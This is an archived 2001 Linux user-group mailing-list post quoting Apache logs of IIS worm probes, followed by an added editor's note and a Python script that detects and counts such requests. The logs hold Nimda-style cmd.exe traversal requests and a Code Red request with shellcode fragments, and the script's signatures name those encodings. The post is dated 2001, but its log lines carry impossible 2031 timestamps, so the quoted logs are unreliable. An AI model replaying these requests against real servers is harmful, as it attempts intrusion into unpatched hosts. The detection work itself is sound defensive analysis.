[wplug] weird apache logs

coldfire rolick571 at duq.edu
Thu Dec 27 14:19:16 EST 2001


I've been getting some crazy GET requests in my logs ... my guess is that
they are some kind of NT or IIS exploits ... just not sure ... here are
some ..


165.229.57.211 - - [27/Dec/2031:00:39:28 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 275
165.229.57.211 - - [27/Dec/2031:00:39:28 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 273
165.229.57.211 - - [27/Dec/2031:00:39:29 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
165.229.57.211 - - [27/Dec/2031:00:39:29 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
165.229.57.211 - - [27/Dec/2031:00:39:30 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
165.229.57.211 - - [27/Dec/2031:00:39:30 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
165.229.57.211 - - [27/Dec/2031:00:39:31 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
165.229.57.211 - - [27/Dec/2031:00:39:31 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330
165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:32 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:33 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
165.229.57.211 - - [27/Dec/2031:00:39:33 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280
165.229.57.211 - - [27/Dec/2031:00:39:34 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280
165.229.57.211 - - [27/Dec/2031:00:39:34 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
165.229.57.211 - - [27/Dec/2031:00:39:35 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

another:

209.83.111.164 - - [19/Dec/2031:04:03:51 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 317

...

I've received several of these from IPs which have no DNS entries or
rDNS entries ... I'm not worried.  Just curious.


coldie
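Editor's note, added to the archive and not part of coldie's post: the request patterns above are the well-known IIS worm probes of that era (the `/default.ida?NNNN...%u9090` request is the Code Red signature; the `root.exe` and `cmd.exe?/c+dir` requests with `%c0%af`, `%255c` and similar encodings are the Nimda / Unicode directory traversal probes). On an Apache host they hit nothing and return 404 or 400, exactly as in the lines above. The script below is an added example that shows how to pull such probes out of an Apache common-log-format access log and count them per source address; it also rejoins requests that a mail client has wrapped onto two lines, as happened in this post. The IP addresses, dates and log lines in `SAMPLE_LOG` are constructed for the example, and the signature list is built only from the encodings that appear in the post.

```python
"""Flag IIS-worm-style probe requests in Apache access logs.

Added example (not from the wplug post). Parses common-log-format lines,
rejoins requests that were wrapped onto a continuation line, tags each
request that matches a known probe pattern, and counts hits per source IP.
"""
import re
from collections import Counter

# Constructed sample log, modelled on the post; addresses and years are
# made up. Two requests are wrapped after "GET", as the post's lines were.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Dec/2001:00:39:28 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 275
10.0.0.5 - - [27/Dec/2001:00:39:29 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 283
10.0.0.5 - - [27/Dec/2001:00:39:32 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
10.0.0.5 - - [27/Dec/2001:00:39:33 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280
10.0.0.9 - - [19/Dec/2001:04:03:51 -0500] "GET /default.ida?NNNNNNNN%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 400 317
10.0.0.7 - - [27/Dec/2001:01:10:00 -0500] "GET /index.html HTTP/1.0" 200 1043
"""

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)
# A real log line starts with a dotted-quad; anything else is a continuation.
LINE_START_RE = re.compile(r'^\d{1,3}(\.\d{1,3}){3} ')

# Probe patterns taken from the requests quoted in the post.
SIGNATURES = {
    "iis-cmd-exe": re.compile(r'/cmd\.exe', re.I),
    "iis-root-exe": re.compile(r'/root\.exe', re.I),
    "code-red-ida": re.compile(r'/default\.ida\?', re.I),
    "encoded-traversal": re.compile(
        r'\.\.%(c0%af|c0%2f|c1%1c|c1%9c|255c|252f|%35%63|%35c|25%35%63)', re.I),
}


def unwrap(text):
    """Rejoin wrapped log lines: a line not starting with an IP is glued
    to the previous one with a single space (the wrap replaced a space)."""
    lines = []
    for raw in text.splitlines():
        if LINE_START_RE.match(raw) or not lines:
            lines.append(raw)
        else:
            lines[-1] = lines[-1] + " " + raw.strip()
    return lines


def parse_line(line):
    """Return a dict of the log fields, or None if the line is not CLF."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(path):
    """Names of every signature that matches the request path, in order."""
    return [name for name, rx in SIGNATURES.items() if rx.search(path)]


def scan(text):
    """Return (hits, per_ip): hits is a list of (ip, status, path, tags)
    for flagged requests; per_ip counts flagged requests per source."""
    hits = []
    per_ip = Counter()
    for line in unwrap(text):
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["path"])
        if tags:
            hits.append((rec["ip"], rec["status"], rec["path"], tags))
            per_ip[rec["ip"]] += 1
    return hits, per_ip


if __name__ == "__main__":
    flagged, counts = scan(SAMPLE_LOG)
    for ip, status, path, tags in flagged:
        print(f"{ip} {status} {','.join(tags)} {path}")
    print("flagged requests per source:", dict(counts))
```

Run it against a real `access_log` by passing the file's contents to `scan()`. Requests that match and return 404 or 400 are scanner noise on a non-IIS server; the per-IP counts are the useful part, since a single address producing a dozen of these in a few seconds is an automated scan rather than a stray client.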



